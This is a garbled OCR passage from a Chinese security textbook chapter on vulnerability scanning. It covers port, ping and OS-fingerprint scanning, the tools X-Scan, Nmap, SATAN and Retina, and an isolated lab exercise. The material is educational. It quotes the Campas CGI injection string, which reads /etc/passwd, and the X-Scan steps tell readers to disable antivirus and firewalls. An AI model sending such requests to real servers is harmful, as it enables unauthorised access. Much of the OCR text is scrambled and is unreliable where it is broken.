(1) CGI 漏洞 扫描 。CGI 表示 公用 网 关 接 口 ， 其 所 包含 的 内 容 非常 宽泛 ， 可 支持 多 种 编 
程 语言 。 在 应 用 基于 CGI 语言 标准 开发 的 计算 机 应 用 中 若 处 理 不 当 则 很 有 可 能 在 输入 输出 
或 指令 执行 等 方面 出 现 意外 状况 ， 导 致 网 络 稳定 性 变 差 、 网 络 受 到 安全 威胁 等 ， 即 CGI 漏 
洞 。 对 于 该 类 型 的 漏洞 ， 可 以 使 用 以 下 方式 扫描 分 析 。 以 Campas 漏洞 为 例 ， 该 漏洞 允许 
非法 用 户 查 看 存储 于 Web 端的 数据 信息 ， 其 具有 以 下 特征 码 : Get/cgibin/ 
campas?%()acat/()a/etc/passwd%()a。 对 其 进行 扫描 时 可 以 使 用 Winsock 工具 与 服务 器 的 
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HTTP 端口 建立 连接 ， 连 接 建 立 后 向 服务 器 发 送 GET 请 求 ， 请 求 即 为 Campas 漏洞 的 特征 
码 ， 然 后 根据 服务 器 返回 的 信息 确认 其 中 是 否 存 在 该 漏洞 ， 若 不 存在 该 漏洞 则 服务 器 会 返回 
HTTP404 的 信息 ， 若 存在 则 会 返回 相应 的 信息 ， 此 时 需要 根据 实际 情况 对 漏洞 进行 修复 。 

(2) Unicode 漏洞 扫描 。Unicode 是 一 种 标准 的 编码 方式 ， 但 是 计算 机 系统 在 处 理 该 类 
型 编码 时 容易 出 现 错误 ， 对 其 进行 漏洞 扫描 与 上 述 CGI 漏洞 扫描 方式 类 似 ， 不 同 之 处 在 于 
连接 函数 为 Connect 函数 ， 通 信 端 口 为 80 端口 ， 特 征 码 也 为 Unicode 漏洞 所 具有 的 特征 
码 。 根 据 返 回 结 果 可 以 确认 网 络 中 是 否 存在 该 类 型 的 安全 漏洞 。 

总 之 ， 计 算 机 网 络 一 直 处 于 发 展 和 变化 的 状态 ， 其 中 可 能 存在 的 安全 漏洞 受 多 种 因素 
的 影响 是 不 尽 相 同 的 ， 为 获得 较为 全 面 的 扫描 结果 ， 所 使 用 的 扫描 技术 也 是 不 断 变化 的 。 
为 做 好 计算 机 网 络 的 安全 防护 工作 ， 一 方面 要 更 新 扫描 方法 发 现 漏洞 ， 另 一 方面 要 及 时 修 
复 漏 洞 ， 避 免 因 漏洞 而 出 现 安全 问题 。 


5.3 ”漏洞 扫描 技术 的 原理 


漏洞 扫描 可 以 划分 为 ping 扫描 、 端 口 扫描 、OS 探测 、 脆 弱点 探测 、 防 火 墙 扫描 5 种 
主要 技术 ， 每 种 技术 实现 的 目标 和 运用 的 原理 各 不 相同 。 按 照 TCP/IP 协议 艇 的 结构 ， 
ping 扫描 工作 在 互联 网 络 层 ， 端 口 扫描 、 防 火 墙 探测 工作 在 传输 层 ，OS 探测 、 脆 弱点 探 
测 工作 在 互联 网 络 层 、 传 输 层 、 应 用 层 。 ping 扫描 确定 目标 主机 的 IP 地 址 ， 端 口 扫描 探 
测 目标 主机 所 开放 的 端口 ， 然 后 基于 端口 扫描 的 结果 ， 进 行 OS 探测 和 脆弱 点 扫描 。 


5.3.1 ping 扫描 


ping 扫描 是 指 侦 测 主机 人 P 地 址 的 扫描 。ping 扫描 的 目的 就 是 确认 目标 主机 的 TCP/IP 
网 络 是 否 联 通 ， 即 扫描 的 IP 地 址 是 否 分 配 了 主机 。 对 没有 任何 预知 信息 的 黑客 而 言 ，ping 
扫描 是 进行 漏洞 扫描 及 入 侵 的 第 一 步 ， 对 已 经 了 解 网 络 整体 卫 划分 的 网 络 安全 人 员 来 讲 ， 
也 可 以 借助 ping 扫描 对 主机 的 卫 分 配 有 一 个 精确 的 定位 。 大 体 上 ，ping 扫描 是 基于 ICMP 
协议 的 。 其 主要 思想 就 是 构造 一 个 ICMP 包 ， 发 送 给 目标 主机 ， 从 得 到 的 响应 来 进行 判 
断 。 根 据 构造 ICMP 包 的 不 同 ， 分 为 ECHO 扫描 和 non-ECHO 扫描 两 种 。 

1. ECHO 扫描 


向 目标 卫 地 址 发 送 一 个 ICMP ECHOREQUEST(ICMP type 8) 的 包 ， 等 待 是 否 接收 至 
UICMP ECHO REPLY(ICMP type 0)。 如 果 收 到 了 ICMP ECHO REPLY， 就 表示 目标 卫 上 
存在 主机 ; 否则 就 说 明 没有 主机 。 值 得 注意 的 是 ， 如 果 目 标 网 络 上 的 防火 墙 配 置 为 阻止 
ICMP ECHO 流量 ，ECHO 扫描 不 能 真实 反映 目标 人 上 是 否 存 在 主机 。 

此 外 ， 如 果 向 广播 地 址 发 送 ICMPECHO REQUEST， 网 络 中 的 UNIX 主机 会 响应 该 请 
求 ， 而 Windows 主机 不 会 生成 响应 ， 这 也 可 以 用 来 进行 OS 探测 。 


2. non-ECHO 扫描 


向 目的 卫 地 址 发 送 一 个 ICMP TIMESTAMP REQUESTGCMP type 13), 或 ICMP 
ADDRESS MASK REQUEST (CMP type 17) 的 包 ， 根 据 是 否 收 到 响应 ， 可 以 确定 目的 主机 
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是 否 存 在 。 当 目标 网 络 上 的 防火 墙 配 置 为 阻止 ICMP ECHO 流量 时 ， 则 可 以 用 non.ECHO 
扫描 来 进行 主机 探测 。 


5.3.2 ”端口 扫描 


端口 扫描 用 来 探测 主机 所 开放 的 端口 。 端 口 扫描 通常 只 做 最 简单 的 端口 联通 性 测试 ， 
不 做 进一步 的 数据 分 析 ， 因 此 比较 适合 进行 大 范围 的 扫描 : 对 指定 卫 地 址 进行 某 个 端 
值 段 的 扫描 ， 或 者 指定 端口 值 对 某 个 IP 地 址 段 进行 扫描 。 根 据 端口 扫描 使 用 的 协议 ， 分 为 
TCP 扫描 和 UDP 扫描 。 


1.TCP 扫描 


主机 间 建 立 TCP 连接 分 为 以 下 三 步 (也 称 三 次 握手 )。 

(1) 请 求 端 发 送 一 个 SYN 包 ， 指 明 打 算 连 接 的 目的 端口 。 

(2) 观察 目的 端 返回 的 包 : 返回 SYN/ACK 包 ， 说 明 目 的 端口 处 于 侦 听 状态 ， 返 
RST/ACK 包 ， 说 明 目 的 端口 没有 侦 听 ， 连 接 重 置 。 

(3) 若 返 回 SYN/ACK 包 ， 则 请 求 端 向 目的 端口 发 送 ACK 包 完 成 三 次 握手 ，TCP 连接 
建立 。 

根据 TCP 连接 的 建立 步骤 ，TCP 扫描 主要 包含 两 种 方式 。 

1) TCP 全 连接 和 半 连 接 扫描 

全 连接 扫描 通过 三 次 握手 ， 与 目的 主机 建立 TCP 连接 ， 目 的 主机 的 log 文件 中 将 记录 
这 次 连接 。 而 半 连 接 扫描 (也 称 TCP SYN 扫描 ) 并 不 完成 TCP 三 次 握手 的 全 过 程 。 扫 描 者 
发 送 SYN 包 开 始 三 次 握手 ， 等 待 目的 主机 的 响应 。 如 果 收 到 SYN/ACK 包 ， 则 说 明 目 标 端 
处 于 侦 听 状态 ， 扫 描 者 马上 发 送 RST 包 ， 中 止 三 次 握手 。 因 为 半 连 接 扫描 并 没有 建立 
TCP 连接 ， 目 的 主机 的 log 文件 中 可 能 不 会 记录 此 扫描 。 

2) TCP 隐蔽 扫描 

根据 TCP 协议 ， 处 于 关闭 状态 的 端口 在 收 到 探测 包 时 会 响应 RST 包 ， 而 处 于 侦 听 状 
态 的 端口 则 忽略 此 探测 包 。 根 据 探测 包 中 各 标志 位 设置 的 不 同 ，TCP 隐蔽 扫描 又 分 为 
SYN/ACK 扫描 、FIN 扫描 、XMAS( 圣 诞 树 ) 扫 描 和 NULL 扫描 4 种 。 

SYN/ACK 扫描 和 FIN 扫描 均 绕 过 TCP 三 次 握手 过 程 的 第 一 步 ， 直 接 给 目的 端口 发 送 
SYN/ACK 包 或 者 FIN 包 。 因 为 TCP 是 基于 连接 的 协议 ， 目 标 主机 认为 发 送 方 在 第 一 步 中 
应 该 发 送 的 SYN 包 没 有 送出 ， 从 而 定义 这 次 连接 过 程 错误 ， 会 发 送 一 个 RST 包 以 重 置 连 
接 。 而 这 正 是 扫描 者 需要 的 结果 一 一 只 要 有 响应 ， 就 说 明 目 标 系统 存在 ， 且 目标 端口 处 于 
关闭 状态 。 

XMAS 扫描 和 NULL 扫描 正好 相反 ，XMAS 扫描 设置 TCP 包 中 所 有 标志 位 (URG、 
ACK、RST、PSH、SYN、FIN)， 而 NULL 扫描 则 关闭 TCP 包 中 的 所 有 标志 位 。 


2. UDP 扫描 


UDP 协议 是 数据 包 协 议 ， 为 了 要 发 现 正在 服务 的 UDP 端口 ， 通 常 的 扫描 方式 是 构造 
一 个 内 容 为 空 的 UDP 数据 包 送 往 目的 端口 。 若 目的 端口 上 有 服务 正在 等 待 ， 则 目的 端 
返回 错误 的 消息 ， 若 目的 端口 处 于 关闭 状态 ， 则 目的 主机 返回 ICMP 端口 不 可 达 消 息 。 因 


(2. 


加 


为 UDP 端 
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扫描 软件 要 计算 传输 中 丢 包 的 数量 ， 所 以 UDP 端口 扫描 的 速度 很 慢 。 


5.3.3 ”OS 探测 


OS 探测 有 双重 目的 : 一 是 探测 目标 主机 的 OS 信息 ; 二 是 探测 提供 服务 的 计算 机 程序 
的 信息 。 比 如 OS 探测 的 结果 是 : OS 是 Windows XP SP3; 服务 器 平台 是 IS 4.0。 


1. 二 进 制 信息 探测 
通过 登录 目标 主机 ， 从 主机 返回 的 banner 中 得 知 OS 类 型 、 版 本 等 ， 这 是 最 简单 的 OS 


探测 技术 。 


2. HTTP 响应 分 析 

在 和 目标 主机 建立 HTTP 连接 后 ， 可 以 分 析 服 务 器 的 响应 包 得 出 OS 类 型 。 

3. 栈 指纹 分 析 

网 络 上 的 主机 都 会 通过 TCP/IP 或 类 似 的 协议 栈 来 互通 互联 。 由 于 OS 开发 商 不 唯一 ， 
系统 架构 多 样 ， 甚 至 软件 版 本 的 差异 ， 都 导致 了 协议 栈 具 体 实现 上 的 不 同 。 对 错误 包 的 响 
应 ， 默 认 值 等 都 可 以 作为 区 分 OS 的 依据 。 

1) 主动 栈 指纹 探测 

主动 栈 指纹 探测 是 主动 向 主机 发 起 连接 ， 并 分 析 收 到 的 响应 ， 从 而 确定 OS 类 型 的 技术 。 

(1) FIN 探测 。 跳 过 TCP 三 次 握手 的 顺序 ， 给 目标 主机 发 送 一 个 FIN 包 。RFC 793 规 
定 ， 正 确 的 处 理 是 没有 响应 的 ， 但 有 些 O0S， 如 MS Windows、CISCO、HP/UX 等 会 响应 
一 个 RST 包 。 


(2) Bogus 标志 探测 。 某 些 OS 会 设置 SYN 包 中 TCP 头 的 未 定义 位 (一 般 为 64 位 或 128 


位 )， 而 某 些 OS 在 收 到 设置 这 些 Bogus 位 的 SYN 包 后 ， 会 重 置 连接 。 

(3) 统计 ICMP ERROR 报 文 。 RFC 1812 中 规定 了 ICMP ERROR 消息 的 发 送 速度 。 
Linux 设 定 了 目标 不 可 达 消 息 上 限 为 80 个 /4s。OS 探测 时 可 以 向 随机 的 高 端 UDP 端口 大 量 
发 包 ， 然 后 统计 收 到 的 目标 不 可 达 消 息 。 用 此 技术 进行 OS 探测 时 时 间 会 长 一 些 ， 因 为 要 


大 量 发 包 ， 并 且 还 要 等 待 响 应 ， 同 时 也 可 能 出 现 网 络 中 丢 包 的 情况 。 


(4) ICMP ERROR 报 文 引用 。RFC 文件 中 规定 ，ICMP ERROR 消息 要 引用 导致 该 消息 
的 ICMP 消息 的 部 分 内 容 。 例 如 ， 对 于 端口 不 可 达 消 息 ， 某 些 OS 返回 收 到 的 他 头 及 后 续 的 
8 个 字 节 ，Solaris 返回 的 ERROR 消息 中 则 引用 内 容 更 多 一 些 ， 而 Linux 比 Solaris 还 要 多 。 

2) 被 动 栈 指纹 探测 

被 动 栈 指纹 探测 是 在 网 络 中 监听 ， 分 析 系 统 流 量 ， 用 默认 值 来 猜测 OS 类 型 的 技术 。 


(D TCP 初始 化 窗口 尺寸 。 通 过 分 析 响 应 中 的 初始 窗口 大 小 来 猜测 OS 的 技术 比较 可 
靠 ， 因 为 很 多 OS 的 初始 窗口 尺寸 不 同 。 比 如 AIX 设置 的 初始 窗口 尺寸 是 0x3F25， 而 


Windows NT5、OpenBSD、FreeBSD 设置 的 值 是 0x402E。 

(2) Don't Fragment 位 。 为 了 增进 性 能 ， 某 些 OS 在 发 送 的 包 中 设置 了 DF 位 ， 可 以 从 
DF 位 的 设置 情况 中 做 大 概 的 判断 。 

(3) TCPISN 采样 。 建 立 TCP 连接 时 ，SYN/ACK 中 初始 序列 号 ISN 的 生成 存在 规律 ， 
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如 固定 不 变 、 随 机 增加 (Solaris、FreeBSD 等 )、 真 正 的 随机 (Linux 2.0.*)， 而 Windows 使 用 
的 是 时 间 相 关 模 型 ，ISN 在 每 个 不 同时 间 段 都 有 固定 的 增 量 。 


5.3.4 ”脆弱 点 扫描 


从 对 黑客 攻击 行为 的 分 析 和 脆弱 点 的 分 类 ， 绝 大 多 数 扫描 都 是 针对 特定 操作 系统 中 特 
定 的 网 络 服务 来 进行 的 ， 即 针对 主机 上 的 特定 端口 。 脆 弱点 扫描 使 用 的 技术 主要 有 基于 脆 
弱点 数据 库 和 基于 插件 两 种 。 


1. 基于 脆弱 点 数据 库 的 扫描 


首先 构造 扫描 的 环境 模型 ， 对 系统 中 可 能 存在 的 脆弱 点 、 过 往 黑客 攻击 案例 和 系统 管 
理 员 的 安全 配置 进行 建 模 与 分 析 。 其 次 基于 分 析 的 结果 ， 生 成 一 套 标 准 的 脆弱 点 数据 库 及 
匹配 模式 。 最 后 由 程序 基于 脆弱 点 数据 库 及 匹配 模式 自动 进行 扫描 工作 。 脆 弱点 扫描 的 准 
确 性 取决 于 脆弱 点 数据 库 的 完整 性 及 有 效 性 。 

2. 基于 插件 的 扫描 

插件 是 由 脚本 语言 编写 的 子 程序 模块 ， 扫 描 程序 可 以 通过 调用 插件 来 执行 扫描 。 添 加 
新 的 功能 插件 可 以 使 扫描 程序 增加 新 的 功能 ， 或 者 增加 可 扫描 脆弱 点 的 类 型 与 数量 。 也 可 
以 升级 插件 来 更 新 脆弱 点 的 特征 信息 ， 从 而 得 到 更 为 准确 的 结果 。 插 件 技术 使 脆弱 点 扫描 
软件 的 升级 维护 变 得 相对 简单 ， 而 专用 脚本 语言 的 使 用 也 简化 了 编写 新 插件 的 编程 工作 ， 
使 弱点 扫描 软件 具有 很 强 的 可 扩展 性 。 


5.3.5 ”防火 墙 规则 探测 


采用 类 似 于 traceroute 的 人 P 数据 包 分 析 法 ， 检 测 能 否 给 位 于 过 滤 设备 后 的 主机 发 送 一 
个 特定 的 包 ， 目 的 是 便于 漏洞 扫描 后 的 入 侵 或 下 次 扫描 的 顺利 进行 。 通 过 这 种 扫描 ， 可 以 
探测 防火 墙 上 打开 或 允许 通过 的 端口 ， 并 且 探 测 防火 墙 规则 中 是 否 允 许 带 控制 信息 的 包 通 
过 ， 更 进一步 ， 可 以 探测 到 位 于 数据 包 过 滤 设 备 后 的 路 由 器 。 


5.4 ”常用 扫描 工具 


漏洞 扫描 器 是 自动 检测 远程 或 本 地 主机 安全 性 弱点 的 程序 。 通 过 使 用 漏洞 扫描 器 ， 发 
现 所 维护 的 Web 服务 器 的 各 种 TCP 端口 的 分 配 、 提 供 的 服务 、Web 服务 软件 版 本 和 这 些 
服务 及 软件 呈现 在 Intemet 上 的 安全 漏洞 。 从 而 在 计算 机 网 络 系统 安全 保卫 战 中 做 到 “有 
的 放 矢 ”， 及 时 修补 漏洞 ， 就 可 以 有 效 地 阻止 入 侵 事件 的 发 生 ， 从 而 构筑 坚固 的 安全 防 
线 。 扫 描 工 具 可 以 通过 手机 系统 的 信息 自动 检测 远程 或 本 地 主机 安全 性 弱点 的 程序 ， 通 过 
使 用 扫描 工具 ， 可 以 发 现 远 程 服务 器 的 各 种 TCP 端口 的 分 配 及 提供 的 服务 以 及 它们 的 软件 
版 本 ， 这 能 让 网 络 管理 员 直 观 地 了 解 远 程 主机 所 存在 的 安全 问题 。 采 用 适当 的 工具 ， 在 黑 
客 利用 这 些 常见 漏洞 之 前 ， 快 速 简便 地 发 现 这 些 漏洞 。 

扫描 工具 应 该 具有 以 下 3 项 功能 。 
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@ ”发 现 一 个 主机 或 网 络 。 
@ 一旦 发 现 一 台 主 机 ， 可 以 发 现 该 主机 上 运行 的 服务 。 
@ ”通过 测试 这 些 服务 发 现 漏洞 。 


5.4.1 X-Scan 


X-Scan 是 国内 最 著名 的 综合 扫描 器 之 一 ， 它 完全 免费 ， 是 不 需要 安装 的 绿色 软件 ， 界 
面 支持 中 文 和 英文 两 种 语言 ， 包 括 图 形 界面 和 命令 行 方式 。 主 要 由 国内 著名 的 民间 黑客 组 
完成 ， 从 2000 年 的 内 部 测试 版 X-Scan V0.2 到 目前 的 最 新 版 本 X-Scan 3.3- 
cn 都 凝聚 了 国内 众多 黑客 的 心血 。 最 值得 一 提 的 是 ，X-Scan 把 扫描 报告 和 安全 焦点 网 站 
相连 接 ， 对 扫描 到 的 每 个 漏洞 进行 “风险 等 级 ”评估 ， 并 提供 漏洞 描述 、 漏 洞 溢出 程序 ， 
方便 网 管 测试 、 修 补漏 洞 。 

采用 多 线程 方式 对 指定 IP 地 址 段 (或 单机 ) 进 行 安全 漏洞 检 3 
图 形 界面 和 命令 行 两 种 操作 方式 ， 扫 描 内 容 包括 远程 操作 系统 类 | 
及 端口 BANNER 信息 、CGI 漏洞 、IIS 漏洞 、RPC 漏洞 、SQL-Server、FTP-Server、 
SMTP-Server、POP3-Server、NT-Server 弱 口 令 用 户 、NT 服务 器 NetBIOS 信息 等 。 扫 描 结 
果 保 存在 /log/ 目 录 中 ，index_*.htm 为 扫描 结果 索引 文件 。 

(1) 软件 的 安装 。 首 先 将 本 机 所 有 的 杀毒 软件 、 防 火 墙 等 暂时 关闭 ， 软 件 无 需 安装 ， 
将 文件 解压 后 可 直接 运行 “xscan_gui.exe” 程 序 。 

(2) 获取 本 机 的 瑟 地 址 ， 以 设置 内 网 扫描 范围 。 选 择 “ 开 始 ” 一 “运行 ”菜单 命令 ， 
输入 “CMD” 按 Enter 键 ， 输 入 “IPCONFIG”， 如 图 5.5 所 示 ， 其 中 “IP ADDRESS” 的 
值 便 是 本 机 卫 地 址 。 


图 5.5 ”获取 本 机 IP 地 址 


(3) 参数 的 设置 。 该 软件 所 有 的 重要 参数 都 是 在 “设置 ”选项 的 “扫描 参数 ”中 设置 
的 ， 如 图 5.6 所 示 。 首 先 设置 扫描 范围 ， 即 扫描 的 地 址 范围 ， 在 “指定 IP 范围 ”文本 框 中 
输入 10.1.152.1-10.1.152.254， 设 置 本 机 所 在 网 段 的 卫 范围 。 然 后 在 “全 局 设置 ”一 “ 扫 
描 模块 ”里 选中 “开放 服务 ”“NT-Server 弱 口 令 ”“NetBios 信息 ”“FTP 弱 口 令 ” 


LN. 


Wm mm 


“SQL-Server 弱 


发 线程 数量 ” 
网 络 因素 ， 所 以 在 此 暂 设置 为 10 和 100。 


及 
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令 ” 等 几 个 选项 ， 如 图 5.7 所 示 。 


并 发 扫 入 rise -io 152 254 
其 地 设置 

日 插件 设置 地 址 污 
SHIP 相关 设置 


厂 从 文件 获 职 主机 列表 


et 


i 


图 5.7 扫描 参数 设置 


(4) 具体 可 按 需 要 自行 设置 。 在 “并 发 扫描 ”中 的 “最 大 并 发 主机 数量 ”和 “最 大 并 


， 分 别 输入 10 和 100， 理 论 上 数值 越 大 越 快 ， 但 是 实际 上 还 得 考虑 计算 机 
“扫描 报告 ”是 设置 生成 报告 类 型 的 ， 有 3 种 


类 型 可 选 ， 即 HIML、XML、TXT， 一 般 建议 使 用 HIML。 在 “其 他 设置 ”中 要 记得 选择 
无 条 件 扫描 ”， 和 否则 会 出 现 一 些 得 不 到 任何 数据 的 情况 ， 如 图 5.8 所 示 。 


全 


(5) 在 “插件 设置 ”选项 中 ， 主 要 设置 两 个 选项 ， 其 他 基本 可 
关 设 置 ” 中 ， 以 及 默认 扫描 一 些 主要 的 端口 


”中 ,在 己 有 的 端口 最 后 面 加 一 个 逗号 和 想 要 扫描 的 端口 ， 其 他 的 可 以 保持 默认 。 


SNMP 相关 设置 ”中 ， 全 部 勾 选 ， 如 


表 敏感 键 值 ”“ 服 务 器 时 间 ”“ 共 享 资源 列表 ” 
最 后 单 击 “ 确 定 


5.10 所 示 ， 其 他 的 选项 保持 默认 ， 


图 5.9 所 示 。 在 “NetBIOS 相关 设置 ”中 ， 选 中 “ 


“用 户 列表 ” 
”按钮 。 


“本 地 组 列表 ” 和， 


以 保持 默认 。 在 “端口 
， 也 可 以 自 定义 添加 ， 方 法 是 在 “ 待 测 端 


E 


第 5 章 网 络 漏洞 扫描 技术 全 时 


图 5.8 其 他 设置 图 5.9 SNMP 相关 设置 


(6) 开始 扫描 。 选 择 “ 文 件 ” 一 “开始 扫描 ”菜单 命令 。 接 下 来 的 事情 就 是 等 待 扫描 
结束 。 当 扫描 完成 ， 相 关 的 信息 会 显示 在 界面 上 ， 而 且 软 件 会 自动 生成 HTML 文件 的 报 
告 。 在 软件 窗口 中 的 左边 为 扫描 的 结果 信息 条 目 ， 条 目 可 以 展开 ， 可 以 得 到 更 详细 的 信 
息 。 从 中 可 以 看 到 关于 被 扫描 主机 的 各 种 信息 ， 如 系统 类 型 、 开 放 服 务 、 开 放 端 口 、 对 应 
端口 的 服务 、 弱 口令 、 空 口令 、 主 机 共享 资源 、 漏 洞 等 信息 。 在 软件 的 右 下 窗口 为 扫描 的 
进度 信息 ， 分 为 “普通 信息 ”“ 漏 洞 信息 ”“ 错 误 信息 ”， 实 用 性 不 大 。 


5.10 NETBIOS 相关 设置 


最 有 用 的 便 是 软件 生成 的 报告 文件 ， 该 报告 文件 存 于 “X-Scan-v3.3-cn\ X-Scan- 
V3.3\log\” 中 ，index_*.htm 为 扫描 结果 索引 文件 。 


5.4.2 Nmap 


Nmap( 网 络 映 射 器 ) 是 一 款 用 于 网 络 发 现 和 安全 审计 的 网 络 安全 工具 ， 它 是 一 款 自由 软 
件 。 软 件 名 字 Nmap 是 Network Mapper 的 简称 。 通 常情 况 下 ，Nmap 用 于 以 下 用 途 。 
(1) 列举 网 络 主 机 清单 。 


(2. 


oo 区》 计算 机 网 络 信息 安全 (第 2 版 ) 


(2) 管理 
(3) 监控 
(4) 服务 


Nmap 可 


息 、 侦 测 操 人 


统 安全 。 系 统管 理 员 可 以 利用 


妥 务 升级 调度 。 
证 机。 
运行 状况 。 


以 检测 目标 主机 是 否 
系统 与 设备 类 型 等 信息 。 它 是 网 络 管理 员 必用 的 软件 之 一 ， 用 以 评估 网 络 系 


在 线 、 端 口 开放 情况 、 侦 测 运 行 的 服务 类 型 及 版 本 信 


Nmap 来 探测 工作 环境 中 未 经 批准 使 用 的 服务 器 ， 黑 客 通 常 


会 利用 Nmap 来 搜集 目标 计算 机 的 网 络 设 定 ， 从 而 计划 攻击 的 方法 。Nmap 通常 用 在 信息 


搜集 阶段 ， 用 


权限 提升 阶段 的 输入 。 


于 搜集 目标 主机 的 基本 状态 信息 。 扫 描 结 果 可 以 作为 漏洞 扫描 、 漏 洞 利用 和 
例如 ， 业 界 流行 的 漏洞 扫描 工具 Nessus 与 漏洞 利用 工具 Metasploit 


都 支持 导入 Nmap 的 XML 格式 结果 ， 而 Metasploit 框架 内 也 集成 了 Nmap 工具 (支持 
Metasploit 直接 扫描 )。Nmap 不 仅 可 以 用 于 扫描 单个 主机 ， 也 可 以 适用 于 扫描 大 规模 的 计 
算 机 网 络 (例如 ， 扫 描 Intemet 上 数 万 台 计 算 机 ， 从 中 找 出 感 兴趣 的 主机 和 服务 )。 


5.4.3 SATAN 


安全 管理 


E 员 的 网 络 分 析 工 具 (Security Administrator Tool For Analyzing Networks, 


SATAN) 是 一 个 分 析 网 络 的 安全 管理 和 测试 、 报 告 工具 。 它 用 来 搜集 网 络 上 主机 的 许多 信 
息 ， 并 可 以 识别 且 自 动 报告 与 网 络 相关 的 安全 问题 。 对 所 发 现 的 每 种 问题 ，SATAN 都 提 
供 对 问题 的 解释 以 及 它 可 能 对 系统 和 网 络 安全 造成 影响 的 程度 ， 并 在 所 附 的 资料 中 解释 如 


何 处 理 这 些 问 题 。SATAN 能 


以 多 种 方式 来 选择 目标 ， 并 且 以 表格 的 方式 显示 结果 ， 当 发 


现 漏洞 时 便 会 出 现 相应 的 提示 文字 。 

是 面向 UNIX 环境 ， 用 C 和 Perl 语言 编写 的 一 个 软件 包 ， 为 了 用 户 界 面 的 友 
好 性 ， 还 用 了 一 些 HIML 技术 ， 具 有 友好 的 用 户 界面 ， 并 且 具 有 HTML 接口 ， 可 以 通过 
如 Netscape 等 浏览 器 进行 操作 。 此 外 ， 这 个 软件 具有 良好 的 兼容 性 ， 不 需要 对 其 代码 做 大 


SATAN 


的 修改 ， 就 能 够 向 
5.4.4 Reti 


Ina 


其 他 非 UNIX 平台 移植 。 


Retina 是 网 络 安全 扫描 软件 ， 是 由 eEye 数字 安全 公司 开发 的 。2003 年 12 月 4 日 ， 


eEye 数字 


脑 》 评 为 最 但 


安全 公司 开发 的 企业 安全 软件 方案 Retina&reg; 网 络 安 全 扫描 器 被 《电子 与 电 
编辑 推荐 软件 。 根 据 《 电 子 与 电脑 》2003 年 12 月 30 号 发 布 的 信息 ，Retina 


在 评测 中 表现 出 超过 所 有 其 他 同类 软件 (包括 基于 Linux、UNIX、Windows 平台 的 其 他 同 
类 网 络 安全 扫描 软件 ) 的 性 能 。 
漏洞 ， 并 且 提供 了 可 以 完全 定制 的 助手 工具 。 Retina 的 助手 工具 允许 客户 强制 实施 内 部 安 


全 规则 ， 如 防 病毒 部 署 和 企业 标准 注册 登记 表 的 设置 。 
动 修复 性 能 是 Retina 最 


Retina 最 有 竞争 力 的 优点 在 于 能 够 自动 矫正 许多 检测 出 来 的 


吸引 人 的 工具 之 一 。Retina 已 经 被 业界 认为 是 最 精确 的 非 由 


入 式 网 络 安全 扫描 器 ， 它 包含 最 全 面 的 安全 漏洞 数据 库 ， 该 数据 库 由 eEye 公司 的 研发 队 
伍 所 维护 。 作 为 一 个 同时 面向 分 布 式 企业 用 户 和 单机 网 络 环境 用 户 的 专业 安全 软件 ， 
Retina 已 经 被 许多 世界 上 最 大 的 公司 和 政府 部 门 使 用 。 他 们 用 于 检测 各 个 分 公司 /总 公司 / 政 
府 部 门 的 网 络 安全 ， 矫 正 网 络 中 隐藏 的 漏洞 和 不 安全 的 设置 。 
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5.5 上 机 实践 
5.5.1 漏洞 扫描 与 网 络 监听 
扫描 与 监听 的 实验 环境 如 图 5.11 所 示 。 


192.168.10.1 


事 ” 168.10.5 


Windows 2003 Windows XP 


用 Analyzer 监 听 入 侵 者 用 X-Scan-v3 .3-en 扫 描 
5.11 实验 环境 


入 侵 者 (192.168.10.5): 运行 X-Scan 对 192.168.10.1 进行 漏洞 扫描 。 

被 入 侵 者 (192.168.10.1): 用 Analyzer 分 析 进 来 的 数据 包 ， 判 断 是 否 遭 到 扫描 攻击 。 

(1) 入 侵 者 ， 启 动 X-Scan， 设 置 参数 。 

安装 好 X-Scan 后 有 两 个 运行 程序 ， 即 xscann.exe 和 xscan_gui.exe。xscann.exe 是 扫描 
器 的 控制 台 版 本 ，xscan_gui.exe 是 扫描 器 的 窗口 版 本 。 

在 此 运行 窗口 版 本 (xscan_gui.exe)， 如 图 5.12 所 示 。 单 击 工具 栏 最 左边 的 “设置 扫描 
参数 ”按钮 ， 进 行 相关 参数 的 设置 ， 如 扫描 范围 的 设 定 ，xscanner 可 以 支持 对 多 个 卫 地 址 
的 扫描 ， 即 使 用 者 可 以 利用 xscanner 成 批 扫描 多 个 人 P 地 址 ， 如 在 IP 地 址 范围 内 输入 
192.168.0.1 一 192.168.0.255。 如 果 只 输入 一 个 了 瑟 地 址 ， 扫 描 程 序 将 针对 单独 的 IP 地 址 进行 
扫描 ， 在 此 输入 192.168.10.1。 

(2) 入 侵 者 ， 进 行 漏洞 扫描 。 

如 图 5.12 所 示 ， 单 击 工具 栏 左边 第 二 个 按钮 ， 即 三 角形 按钮 ， 进 行 漏洞 扫描 。 


5.12 ”启动 X-Scan 并 设置 参数 


.LN. 


po mm 计算 机 网 络 信息 安全 (第 2 版 ) 


X-Scanner 集成 了 多 种 扫描 功能 于 一 身 ， 它 可 以 采用 多 线程 方式 对 指定 IP 地 址 段 (或 独 
立 IP 地 址 ) 进 行 安全 漏洞 扫描 ， 扫 描 内 容 包 括 标准 端口 状态 及 端口 banner 信息 、CGI 漏 
洞 、RPC 漏洞 、SQL-Server 默认 账户 、FTP 弱 口 令 、NT 主机 共享 信息 、 用 户 信息 、 组 信 
息 、NT 主机 弱 口 令 用 户 等 。 因 为 结果 比较 多 ， 通 过 控制 台 很 难 阅 读 ， 这 时 xscanner 会 在 
log 下 生成 多 个 HTML 的 中 文 说 明 ， 阅 读 这 些 文档 比较 方便 。 对 于 一 些 已 知 的 CGI 和 RPC 
漏洞 ，X-Scanner 给 出 了 相应 的 漏洞 描述 、 应 用 程序 及 解决 方案 。 

(3) 入 侵 者 ， 扫 描 结 果 

如 图 5.13 所 示 ，“ 普 通信 息 ” 选 项 卡 显示 漏洞 扫描 过 程 中 的 信息 ，“ 漏 洞 信息 ”选项 
卡 显 示 可 能 存在 的 漏洞 ， 如 终端 服务 (端口 3389) 的 运行 就 为 黑客 提供 了 很 好 的 入 侵 通道 。 

(4) 被 入 侵 者 ， 网 络 监听 。 

由 于 Analyzer 3.0al12 在 Windows 2003 SP2 下 不 能 正常 运行 (在 XP SP2 下 可 
以 正常 运行 )， 因 此 选用 以 前 的 版 本 Analyzer 2.2 进行 测试 ， 读 者 可 以 在 
http://analyzer.polito. it/ download htm 下 载 。 

在 入 侵 者 运行 xscan_gui.exe 之 前 被 入 侵 者 运行 Analyzer。 在 入 侵 者 运行 xscan_gui.exe 
